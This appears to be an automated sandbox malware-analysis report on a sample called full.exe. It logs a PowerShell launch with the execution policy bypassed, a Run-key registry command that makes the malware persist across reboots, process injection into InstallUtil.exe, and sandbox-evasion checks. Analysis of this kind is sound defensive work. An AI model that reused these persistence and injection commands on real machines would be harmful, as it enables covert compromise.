                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 10 localhost
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 10 localhostJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 13E0000 memory reserve | memory write watchJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 2DA0000 memory reserve | memory write watchJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 2CF0000 memory reserve | memory write watchJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2077Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1403Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindow / User API: threadDelayed 1089Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindow / User API: threadDelayed 356Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6828Thread sleep count: 2077 > 30Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5916Thread sleep count: 1403 > 30Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6152Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4860Thread sleep time: -30000s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4860Thread sleep time: -30000s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3352Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_BaseBoard
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_BIOS
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\PING.EXELast function: Thread delayed
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: powershell.exe, 00000005.00000002.1736823660.0000020C23514000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1788303047.0000020C3712E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1788303047.0000020C3469A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: BhMHGFsXW
                Source: powershell.exe, 00000005.00000002.1788303047.0000020C3469A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: JvMCI
                Source: powershell.exe, 00000005.00000002.1788303047.0000020C3469A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tD8XLtpMI45nH9tjqVUERL4nRrHhFaxrTYpYpwo6j6BdmXQMmQmI/cEjEsR2qZrsh/+U9dlm/0szkh2pyFnjvwv+8G7uVfIBDMPFRKUpQOwCj2VmCi4w/snSSDftV86xjXzd14/9uhCdB2hHW7HRovsP7WNGM10ipZbU13545hz5/OJ/W
                Source: powershell.exe, 00000005.00000002.1736823660.0000020C23514000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1788303047.0000020C3712E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1788303047.0000020C3469A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: BnoHGFsGKD4z
                Source: full.exe, 00000000.00000002.2101713995.000001D5DB36C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll3
                Source: powershell.exe, 00000005.00000002.1788303047.0000020C3469A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Yt0xYqEQVvMCI
                Source: powershell.exe, 00000005.00000002.1788303047.0000020C3469A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: YTBytECSwLEQZvMCI
                Source: powershell.exe, 00000005.00000002.1788303047.0000020C3469A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ZvMCI
                Source: C:\Users\user\Desktop\full.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: 5.2.powershell.exe.20c2333afa8.1.raw.unpack, rudun.csReference to suspicious API methods: Conversions.ToGenericParameter<CreateApi>((object)Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi)))
                Source: 5.2.powershell.exe.20c2333afa8.1.raw.unpack, rudun.csReference to suspicious API methods: Conversions.ToGenericParameter<CreateApi>((object)Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi)))
                Source: 5.2.powershell.exe.20c2333afa8.1.raw.unpack, rudun.csReference to suspicious API methods: WriteProcessMemory(processInformation.ProcessHandle, num10 + num16, array2, array2.Length, ref bytesWritten)
                Source: 5.2.powershell.exe.20c2333afa8.1.raw.unpack, rudun.csReference to suspicious API methods: ReadProcessMemory(processInformation.ProcessHandle, num8 + 8, ref buffer, 4, ref bytesWritten)
                Source: 5.2.powershell.exe.20c2333afa8.1.raw.unpack, rudun.csReference to suspicious API methods: VirtualAllocEx(processInformation.ProcessHandle, num9, length, 12288, 64)
                Source: C:\Users\user\Desktop\full.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\Adobe.ps1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 720000Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 722000Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: C1E008Jump to behavior
                Source: C:\Users\user\Desktop\full.exeProcess created: C:\Windows\System32\reg.exe reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run\AdobePS1 /t REG_SZ /d "powershell -ExecutionPolicy Bypass -File \"C:\Users\user\AppData\Local\Temp\Adobe.ps1\"" /fJump to behavior
                Source: C:\Users\user\Desktop\full.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\Adobe.ps1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\aVqnxsyILS0b.bat" "Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 65001Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 10 localhostJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
